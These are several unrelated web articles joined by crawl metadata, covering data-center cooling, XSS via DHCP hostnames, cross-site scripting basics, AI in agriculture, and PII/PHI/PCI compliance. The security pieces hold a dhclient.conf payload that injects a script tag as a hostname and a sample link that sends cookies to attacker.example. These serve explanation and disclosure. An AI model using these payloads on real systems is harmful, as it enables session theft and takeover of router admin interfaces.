Data center power and cooling technologies have evolved significantly over the years. Traditional methods such as air conditioning units and raised floors are being replaced by more innovative and energy-efficient solutions. Here are some of the current state-of-the-art cooling technologies:
Hot Aisle/Cold Aisle Containment
This strategy involves segregating the server racks into designated hot aisles and cold aisles, ensuring that the hot exhaust air from servers does not mix with the cold supply air. By isolating the hot and cold air streams, this approach prevents the recirculation of hot air and maximizes the effectiveness of cooling systems.
As a result, cooling efficiency is significantly improved, resulting in reduced energy consumption and lower cooling costs. This approach is widely adopted in modern data centers to enhance their overall energy efficiency and reduce environmental impact.
Liquid Cooling
Newer cooling approaches outperform traditional air-based systems for dense computer equipment. Liquid cooling uses a circulating coolant to carry heat away from components, rather than the fans and heat sinks that air-based systems rely on.
Direct-to-chip cooling involves circulating liquid coolant through microchannels, optimizing heat transfer and dissipating it more efficiently. Immersion cooling, on the other hand, submerges the entire server or components in a non-conductive liquid coolant, allowing for even greater heat dissipation.
These liquid cooling solutions enable higher density server deployments by effectively managing heat generation and reducing the risk of thermal throttling. With improved efficiency and enhanced heat dissipation capabilities, liquid cooling is becoming increasingly popular in data centers and high-performance computing environments.
Free Cooling
Free cooling uses external cool air or water to reduce the need for mechanical cooling, which is especially effective in favorable climates. By relying on the outside environment instead of energy-hungry chillers and compressors, free cooling systems can deliver substantial energy savings compared with conventional cooling methods.
By utilizing this approach, data centers can significantly reduce their energy consumption and operational costs while still maintaining optimal temperatures for their IT equipment. This environmentally friendly solution not only benefits the bottom line but also contributes to a more sustainable and greener data center infrastructure.
Computational Fluid Dynamics (CFD) Analysis
CFD analysis simulates airflow patterns within data centers, helping operators identify potential hotspots and optimize cooling distribution. It takes into account factors such as temperature differentials, airflows, and pressure gradients to provide a detailed picture of air movement within the facility.
Data center managers can use CFD analysis to study airflow patterns in their facilities and pinpoint areas with excess heat or insufficient cooling. This information informs equipment placement and layout design, so cooling resources are used wisely, energy is saved, and the data center runs more efficiently at lower cost.
Monitoring and Automation
Implementing real-time monitoring and automation systems can greatly enhance cooling efficiency. By continuously monitoring temperature, humidity, and airflow, operators can identify any anomalies or deviations from optimal conditions. This proactive approach allows them to promptly adjust cooling parameters before potential issues escalate.
Additionally, automated control systems can dynamically allocate cooling resources based on demand, optimizing energy usage and reducing waste. These intelligent systems ensure that cooling resources are deployed where they are needed most, saving energy and improving overall cooling efficiency.
Real-time monitoring and automation systems give data center operators actionable insight and let them respond quickly, leading to better performance, higher reliability, and lower costs.
As the demand for colocation services continues to rise, efficient cooling practices have become paramount to ensure optimal performance, reliability, and sustainability. Data center colocation generates significant amounts of heat due to the sheer volume of servers and IT equipment housed in these facilities. Inadequate cooling not only leads to decreased performance but also increases the risk of system failures and downtime.
To address this, data centers deploy specialized cooling equipment, including precision air conditioning, hot/cold air separation, and liquid cooling. These methods dissipate heat effectively and maintain stable temperatures, ensuring that servers operate at peak efficiency. By implementing efficient cooling practices, data centers can minimize energy consumption, reduce their carbon footprint, and contribute to a more sustainable IT ecosystem.
In summary, colocation lets businesses house their critical IT infrastructure in another company's facility, and cooling technologies keep that infrastructure safe while conserving energy. Hot aisle/cold aisle containment, liquid cooling, free cooling, CFD analysis, and monitoring automation are all proven practices for improving energy efficiency.
Embracing these practices will not only reduce operational costs but also contribute to a greener and more sustainable future for the data center industry. | <urn:uuid:d655bd28-8888-4458-a3da-9e7aec323c8c> | CC-MAIN-2024-38 | https://www.datacenters.com/news/data-center-cooling-best-practices | 2024-09-19T20:32:11Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652067.20/warc/CC-MAIN-20240919194038-20240919224038-00541.warc.gz | en | 0.922433 | 1,298 | 2.546875 | 3 |
XSS through DHCP: How Attackers Use Standards
During a security assessment, we sometimes need to think outside of the box in order to find interesting and impactful exploits. To aid us in this, we can use protocol standards as a roadmap to assumptions that may be built into a piece of software. Oftentimes, breaking those assumptions means breaking the software. Software may be secure when well-behaved peers follow protocol standards, but vulnerable when they do not.
We recently had a good example of this concept on an assessment, where we violated the DHCP standard in order to perform Cross-Site Scripting (XSS) on a router’s admin interface page.
The router that we were testing, like many others, had a section of the web interface dedicated to listing the devices that were connected to the network. The devices are represented by their hostname, a field the router receives during DHCP IP address negotiation. This raises two very important questions: 1) what are the expected characters in a hostname; and 2) are the hostnames validated or escaped in any way?
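If neither holds, this is easy to probe from a Linux test client, because nothing forces a DHCP client to send a well-formed hostname. A hedged sketch (the interface name and payload are illustrative): add a hostile host-name option to /etc/dhcp/dhclient.conf, then release and renew the lease:

# /etc/dhcp/dhclient.conf
send host-name "<script>alert(document.domain)</script>";

sudo dhclient -r eth0   # release the current lease
sudo dhclient eth0      # renew, sending the malicious hostname

If the router's device list renders that hostname without validation or escaping, the script executes in the administrator's browser the next time the page is viewed. | <urn:uuid:0e1e41e0-bcd7-4bcd-9767-994861b6f674> | CC-MAIN-2024-38 | https://ivision.com/blog/how-attackers-use-standards/ | 2024-09-21T02:51:05Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701427996.97/warc/CC-MAIN-20240921015054-20240921045054-00441.warc.gz | en | 0.966058 | 223 | 3.0625 | 3 |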
The Anatomy of Cross Site Scripting
Cross site scripting (XSS) flaws are a relatively common issue in web application security, but they are still extremely lethal. They are unique in that, rather than attacking a server directly, they use a vulnerable server as a vector to attack a client. This can lead to extreme difficulty in tracing attackers, especially when requests are not fully logged (such as POST requests). Many documents discuss the actual insertion of HTML into a vulnerable script, but stop short of explaining the full ramifications of what can be done with a successful XSS attack. While this is adequate for prevention, the exact impact of cross site scripting attacks has not been fully appreciated. This paper will explore those possibilities.
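As a minimal illustration of the idea (the URLs and parameter name are invented), a reflected XSS flaw turns an innocent-looking link into an attack on whoever clicks it:

# if the server echoes the "q" parameter into the page unescaped, this link
# runs script in the victim's browser and leaks their session cookie
http://vulnerable.example/search?q=<script>document.location='http://attacker.example/c?'+document.cookie</script>

The server is merely the vector; the victim is the client whose browser trusts the vulnerable site.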
Download the paper in PDF format here. | <urn:uuid:f7c442ac-d224-4e86-ae8c-b48a46211d18> | CC-MAIN-2024-38 | https://www.helpnetsecurity.com/2003/11/07/the-anatomy-of-cross-site-scripting/ | 2024-09-21T03:52:38Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701427996.97/warc/CC-MAIN-20240921015054-20240921045054-00441.warc.gz | en | 0.944081 | 153 | 2.6875 | 3 |
AI in agriculture aids in detecting pests, plant diseases, and crop undernutrition on farms. AI-driven sensors can identify and target weeds before deciding which herbicide to apply in the area. This approach, known as precision agriculture, is helping to enhance the overall quality and accuracy of harvests.
The role of computer vision
Feeding billions of people requires vast amounts of land, and cultivating it by hand is no longer feasible. At the same time, crop failures are frequently caused by pest infestations and plant diseases, and such outbreaks are hard to spot and nip in the bud at the scale of modern agricultural operations.
This opens a new application for computer vision techniques. Growers use aerial photography to identify early indicators of plant disease or pests at the macro level, and close-up photographs of leaves and plants at the micro level to identify crop illnesses. The most common computer vision method in these studies is the convolutional neural network.
Please note that we are using the term "computer vision" quite broadly here. Ordinary images are frequently not the most reliable source of information, and many significant aspects of plant life are better studied in other ways: it is often possible to gather hyperspectral images with specialized sensors or carry out 3D laser scanning to better understand plant health. Such techniques are increasingly applied in agronomy thanks to AI in agriculture.
Typically high-resolution, this data is more comparable to medical imaging than to ordinary photos. AgMRI is the name of one such field monitoring system. Specialized models are required to process this data, but because of its spatial organization, convolutional neural networks in particular can be applied.
Research on plant phenotyping and imaging is receiving millions of dollars. The primary task at hand is to gather sizable data sets on crops (often in the form of pictures or three-dimensional images) and compare phenotypic information with plant genotype. The findings and information can be applied to advance agricultural technologies globally. Agriculture is not the only sector to utilize smart artificial intelligence systems; AI in recruitment is also a hot topic. Did you know that Google Interview Warmup is assisting job seekers?
How robots are being utilized in agriculture?
Prospero and other autonomous agricultural robots can dig holes in the ground and plant seeds, following established planting patterns while taking into account the unique features of the area. Robots are also capable of managing the growing process and interacting with each plant individually. They will harvest when the moment is right, once again treating each plant exactly as it should be treated.
Swarm farming is the foundation of Prospero. Imagine a horde of little Prosperos crawling over the crops, leaving behind tidy, even rows of vegetation. It’s interesting to note that Prospero first surfaced in 2011, before the present deep learning revolution reached its pinnacle. Today, you may automate an increasing number of ordinary operations in agriculture thanks to the swiftly spreading use of robots.
Automated drones spray crops. Small and agile drones can deliver hazardous substances more precisely than larger aircraft. In addition, aerial photography taken by sprayer drones can be used to collect data for the computer vision algorithms mentioned at the beginning of this article.
Robots designed specifically for harvesting are being developed and deployed more and more. Combine harvesters have long been in use, but only recently have advances in computer vision and robotics made it possible to build, for instance, a robot that picks strawberries.
Robots like Hortibot can recognize individual weeds and mechanically remove them. This is another fantastic achievement of contemporary robotics and computer vision: until recently it was impossible to distinguish weeds from beneficial plants and to use manipulators to interact with small plants.
It is already evident that ML, AI, and robotics can function well in agriculture even though many agricultural robots are still prototypes or are only being tested on a small scale. It is safe to assume that in the near future, an increasing amount of agricultural activity will be mechanized.
There are now many more applications for AI in agriculture being developed. For instance, a Neuromation pilot project applies computer vision to the animal husbandry sector, a field that has not yet drawn significant interest from the deep learning community.
Machine learning and AI in agriculture
Of course, there have been initiatives to leverage livestock tracking data for machine learning. For instance, the Pakistani business Cowlar debuted a collar with the snappy motto “FitBit for Cows” that wirelessly monitors the activity and temperature of cows. French researchers are working on facial recognition technology for cows.
Additionally, there are initiatives to apply AI to pig farming, a hitherto underutilized sector with a market value of hundreds of billions of dollars. Pigs on modern farms are housed in relatively small groups of the most similar animals. Feed is the primary expense in pig production, so the major goal of contemporary pig farming is to optimize the fattening process.
If farmers had comprehensive knowledge of each pig's weight gain, they would be able to resolve this issue. Animals are often weighed only twice in their entire lives: at the start and the end of fattening. If experts knew how each piglet was gaining weight, they could design an individual fattening regimen, and even an individual mix of feed additives, for each pig. This would greatly increase productivity.
Although driving animals onto scales is not particularly difficult, it causes them a great deal of stress, and stressed pigs lose weight. The new AI research aims to create a novel, non-intrusive approach to animal weighing: Neuromation will infer pigs' weights from photo and video data using a computer vision model. These estimates will then feed into existing analytical machine learning models to improve the fattening process.
What is the future for AI in agriculture?
Agriculture and animal husbandry are sometimes viewed as outdated professions. Today, however, AI in agriculture is becoming a common instrument for many farms.
The primary reason is that agriculture involves countless tasks happening at once, tasks so complex that deep learning and contemporary artificial intelligence are needed to automate them. However similar they may look, cultivated plants and pigs did not come off the same assembly line: each tomato bush and each pig requires an individual approach, so until very recently human intervention was absolutely necessary.
Current developments in artificial intelligence let us automate interactions with plants and animals while taking their individual characteristics into account. Weighing a pig is simpler than passing the Turing test, and driving a tractor in an open field is simpler than driving a car in heavy traffic.
Because agriculture is still one of the world's largest and most significant industries, even a small improvement in efficiency results in significant gains. That is why so many companies are prioritizing AI in agriculture. We have also discussed AI in manufacturing; you can learn more about the future of Industry 4.0 by visiting our article. | <urn:uuid:77179bfd-eca6-43e1-b003-cd015b5b4b3c> | CC-MAIN-2024-38 | https://dataconomy.com/2022/07/25/ai-in-agriculture/ | 2024-09-08T21:37:53Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651035.2/warc/CC-MAIN-20240908213138-20240909003138-00641.warc.gz | en | 0.952795 | 1,463 | 3.515625 | 4 |
In the digital age, data privacy compliance is more than a legal obligation. It's a crucial aspect of business ethics and customer trust. Understanding the nuances of data privacy, however, can be complex. This is especially true when dealing with different types of personal data.
In this guide, we delve into three key types of personal data: Personally Identifiable Information (PII), Protected Health Information (PHI), and Payment Card Information (PCI). Each of these categories has its own set of regulations and compliance requirements. We'll explore the differences and similarities between PII, PHI, and PCI. We'll also discuss the regulations governing each type of data, such as GDPR for personal data, HIPAA for health information, and PCI DSS for payment card data.
Whether you're a business owner, a compliance officer, or an IT professional, this guide is for you. It's also for anyone involved in handling personal data, especially in sectors like healthcare, finance, and e-commerce.
Understanding the basics of personal data
Personal data is a broad term that encompasses various types of information. It refers to any data that can be used to identify an individual. It can also cover more sensitive data like health information or financial details.
Let's break down three key types of personal data: PII, PHI, and PCI. Each of these categories has its own unique characteristics and compliance requirements.
- PII: Personally Identifiable Information
- PHI: Protected Health Information
- PCI: Payment Card Information
Understanding these categories is the first step towards effective data privacy compliance.
What is Personally Identifiable Information (PII)?
Personally Identifiable Information, or PII, is any data that can be used to identify an individual. This can include names, addresses, and social security numbers. But PII can also include less obvious information; for example, IP addresses, login IDs, or device identifiers can also be considered PII.
The key is that if the information can be used to identify a person, either alone or in combination with other data, it's considered PII.
What is Protected Health Information (PHI)?
Protected Health Information, or PHI, is a subset of PII. It refers to any health-related information that can identify an individual. This includes medical records, lab results, and insurance information. It also covers conversations between doctors and patients, as well as billing information.
PHI is protected under the Health Insurance Portability and Accountability Act (HIPAA). This means it's subject to specific regulations and protections.
What is Payment Card Information (PCI)?
Payment Card Information, or PCI, refers to the data associated with a payment card. This includes the cardholder's name, the card number, and the expiry date. PCI also covers sensitive authentication data. This includes the security code on the back of the card as well as any PIN data.
PCI is protected under the Payment Card Industry Data Security Standard (PCI-DSS). This standard sets out specific requirements for the handling and protection of payment card data.
Data privacy regulations and compliance
Data privacy regulations are laws and guidelines that govern how personal data is collected, stored, and used. These regulations aim to protect individuals' privacy and prevent misuse of their information.
Different types of personal data are subject to different regulations. For example, PII is covered by GDPR, PHI is protected under HIPAA, and PCI is governed by PCI-DSS. Understanding these regulations is crucial for any organization that handles personal data. Noncompliance can result in hefty fines as well as reputational damage.
GDPR compliance and personal data
The General Data Protection Regulation, or GDPR, is a European Union regulation that governs the handling of personal data. It applies to all organizations that process the personal data of EU residents, regardless of where the organization is based. GDPR sets out a range of requirements for data protection. These include obtaining clear consent for data processing, protecting data against unauthorized access, and notifying authorities of data breaches.
GDPR also gives individuals certain rights over their data. These include the right to access their data, the right to correct inaccurate data, and the right to have their data deleted.
HIPAA and the protection of health information
The Health Insurance Portability and Accountability Act, or HIPAA, is a US law that protects health information. It applies to healthcare providers, health insurers, and other entities that handle health information. HIPAA establishes rules for the use and disclosure of Protected Health Information (PHI). It requires entities to implement safeguards that protect PHI, and to notify individuals of breaches of their PHI.
HIPAA also gives individuals certain rights over their health information. These include the right to access their health records along with the right to request corrections to their records.
PCI-DSS and the safeguarding payment card data
The Payment Card Industry Data Security Standard, or PCI-DSS, is a set of security standards for organizations that handle payment card information. It applies to all entities that store, process, or transmit cardholder data. PCI-DSS sets out a range of security requirements. These include maintaining a secure network, protecting cardholder data, and regularly monitoring and testing networks.
PCI-DSS also requires entities to maintain a policy that addresses information security. This policy should cover all aspects of the entity's operations, including employee training, incident response, and risk assessment.
The intersection of PII, PHI, and PCI
PII, PHI, and PCI are all types of personal data. However, they are not the same. Each type of data is subject to different regulations and has different protection requirements. Understanding the differences and similarities between PII, PHI, and PCI is crucial for data privacy compliance. It helps organizations to implement appropriate safeguards and comply with relevant regulations.
PII vs PHI: Understanding the overlap
Personally Identifiable Information (PII) is any information that can be used to identify an individual. This includes names, addresses, and Social Security numbers. Protected Health Information (PHI), on the other hand, is a subset of PII: it includes any health-related information that can identify an individual. Therefore, all PHI is PII, but not all PII is PHI. The main difference lies in the additional protections health information receives under HIPAA.
PHI vs PCI: Where they diverge
Protected Health Information (PHI) and Payment Card Information (PCI) both involve sensitive data. However, they are regulated under different standards. PHI is protected under HIPAA, which sets out rules for the use and disclosure of health information. PCI, on the other hand, is governed by PCI-DSS, which sets out security standards for payment card data. The key divergence between PHI and PCI lies in the type of data they cover and the specific protections required.
PII vs PCI: Two distinctive elements
Personally Identifiable Information (PII) and Payment Card Information (PCI) are both types of personal data. However, PII includes any information that can identify an individual, while PCI specifically refers to payment card data. The main distinction between PII and PCI lies in the specific type of data they cover and the regulations governing their protection.
Best practices for data privacy compliance
Data privacy compliance is not a one-time task. It requires ongoing efforts and a comprehensive approach. Here are some best practices to ensure compliance with data privacy regulations.
1. Understand the specific compliance requirements related to the type of data you handle. This includes PII, PHI, and PCI. Each type of data is subject to different regulations and has different protection requirements.
2. Implement robust security measures. This includes data encryption, access controls, and regular audits. These measures help to protect data from unauthorized access and breaches.
Implementing robust security measures
Robust security measures are the backbone of data privacy compliance. Two of the most important, encryption and access controls, are covered below.
Data encryption is one of the most effective security measures. It involves converting data into a code to prevent unauthorized access. Both data at rest and in transit should be encrypted.
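As a minimal illustration of encryption at rest, the sketch below uses the Fernet recipe from Python's widely used `cryptography` package. The key handling here is deliberately simplified: in production, the key would be generated once and kept in a key management service, never alongside the data it protects.

```python
from cryptography.fernet import Fernet  # pip install cryptography

# Generate the key once and store it in a key management service (KMS),
# not in source code or next to the data.
key = Fernet.generate_key()
cipher = Fernet(key)

record = b"name=Jane Doe;card=4111111111111111"
token = cipher.encrypt(record)   # ciphertext is safe to store at rest
print(cipher.decrypt(token))     # recovery is only possible with the key
```

For data in transit, the equivalent safeguard is enforcing TLS on every connection rather than encrypting payloads by hand.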
Access controls are also important. They ensure that only authorized individuals have access to sensitive data. This includes implementing strong authentication measures and limiting access on a need-to-know basis.
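Need-to-know access can be modeled as a mapping from roles to the data classes their duties require. The roles and labels in this sketch are purely illustrative:

```python
# Hypothetical role-based access control over sensitive data classes.
PERMISSIONS = {
    "billing_clerk":   {"PCI"},
    "nurse":           {"PHI"},
    "support_agent":   {"PII"},
    "privacy_officer": {"PII", "PHI", "PCI"},
}

def can_access(role: str, data_class: str) -> bool:
    """Grant access only if the role's duties require this data class."""
    return data_class in PERMISSIONS.get(role, set())

assert can_access("nurse", "PHI")
assert not can_access("support_agent", "PCI")
```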
Regular training and awareness programs
Training and awareness programs are key to sustained data privacy compliance. They help to ensure that all employees understand the importance of data privacy and their role in protecting data.
Regular training should be provided to all employees. This includes training on data privacy regulations, the types of data they handle, and the consequences of noncompliance.
Awareness programs can also be effective. They help to keep data privacy at the forefront of employees' minds and encourage them to take an active role in protecting data.
Data Privacy Impact Assessments (DPIAs)
Data Privacy Impact Assessments (DPIAs) are a useful tool for data privacy compliance. They help to identify and mitigate risks associated with data processing activities.
A DPIA should be conducted for any new project or system that involves processing personal data, ideally before processing begins, so that privacy risks are identified and mitigated early.
Regular DPIAs can help to ensure ongoing compliance and identify any changes that may impact data privacy.
Incident response planning
Incident response planning is crucial for data privacy compliance. It helps to ensure a swift and effective response in the event of a data breach.
An incident response plan should outline the steps to be taken in the event of a breach. This includes identifying the breach, containing it, and notifying affected individuals.
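One way to keep such a plan actionable is to encode its steps, owners, and target deadlines in a form that can be versioned and tested. The steps and hour targets below are illustrative rather than legal guidance, though they echo real requirements such as GDPR's 72-hour regulator notification window:

```python
from dataclasses import dataclass

@dataclass
class ResponseStep:
    name: str
    owner: str
    deadline_hours: int  # target time from breach discovery

# Illustrative plan; real deadlines depend on the regulations that apply.
PLAN = [
    ResponseStep("Identify and scope the breach", "security_team", 4),
    ResponseStep("Contain affected systems", "it_ops", 12),
    ResponseStep("Notify regulators if required", "privacy_officer", 72),
    ResponseStep("Notify affected individuals", "communications", 96),
]

for step in PLAN:
    print(f"{step.deadline_hours:>3}h  {step.owner:<16} {step.name}")
```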
The plan should also be tested and updated regularly to ensure it remains effective and current.
Navigating compliance across different sectors
Data privacy compliance is not a one-size-fits-all process. Different sectors have unique requirements and challenges. Understanding these nuances is key to effective compliance.
In the healthcare sector, for example, the handling of PHI is governed by HIPAA. In e-commerce and finance, businesses must comply with regulations like GDPR and PCI-DSS. Each sector requires a tailored approach to data privacy compliance.
Healthcare: HIPAA, ePHI, and beyond
In the healthcare sector, data privacy compliance is largely governed by HIPAA. This regulation protects PHI, including ePHI, which is PHI that is created, stored, or transmitted in electronic form.
Healthcare providers, insurers, and their business associates must comply with HIPAA. This includes implementing safeguards to protect PHI, conducting regular risk assessments, and providing training to employees.
Beyond HIPAA, healthcare organizations must also consider state-specific laws and other regulations. This underscores the importance of a comprehensive, sector-specific approach to data privacy compliance.
E-commerce and finance: GDPR, PCI-DSS, and more
In the e-commerce and finance sectors, businesses handle a wide range of personal data. This includes PII and PCI, which are subject to regulations like GDPR and PCI-DSS.
GDPR applies to businesses that operate in or serve customers in the EU. It requires businesses to protect personal data and uphold individuals' data rights. PCI-DSS, on the other hand, sets standards for protecting payment card data.
In addition to these regulations, businesses in these sectors must also consider state and national laws, such as the California Consumer Privacy Act (CCPA). This highlights the complexity of data privacy compliance in e-commerce and finance.
Conclusion: The importance of data privacy compliance
In conclusion, data privacy compliance is a critical aspect of modern business operations. Understanding the differences and intersections between PII, PHI, and PCI is key to ensuring compliance and protecting sensitive data.
Whether you're in healthcare, e-commerce, finance, or any other sector, a robust and tailored approach to data privacy compliance is essential. By staying informed about regulations like GDPR, HIPAA, and PCI-DSS, and by implementing best practices, businesses can safeguard personal data, avoid hefty fines, and maintain public trust. | <urn:uuid:8c32f1b8-0e92-486e-8373-f59f5418afe8> | CC-MAIN-2024-38 | https://www.nightfall.ai/blog/pii-vs-phi-vs-pci-the-essential-guide | 2024-09-08T22:42:47Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651035.2/warc/CC-MAIN-20240908213138-20240909003138-00641.warc.gz | en | 0.929554 | 2,492 | 2.96875 | 3 |